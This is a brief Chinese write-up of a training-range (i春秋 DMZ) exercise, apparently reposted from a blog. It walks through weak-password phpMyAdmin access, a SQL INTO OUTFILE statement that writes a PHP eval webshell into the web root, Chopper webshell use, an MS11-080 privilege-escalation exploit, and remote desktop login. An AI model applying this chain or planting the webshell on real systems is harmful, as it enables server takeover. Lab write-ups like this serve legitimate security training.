i春秋DMZ大型靶场实验(二)提权漏洞

拿到靶场 直接进行扫描 爆破路径

发现 phpinfo, phpmyadmin  更具phpinfo 获取跟路径  也可以通过 

输入错路径爆出绝对路径

phpmyamin  弱口令登录  root,root

sql 直接写一句话木马

select  '<?php eval($_POST[1])?>' into outfile 'C:\phpStudy\WWW\1.php'

菜刀连接   上传 ms11080.exe 提权 添加 90sec 用

mstsc 直接远程登录

原文地址:https://www.cnblogs.com/feizianquan/p/11175064.html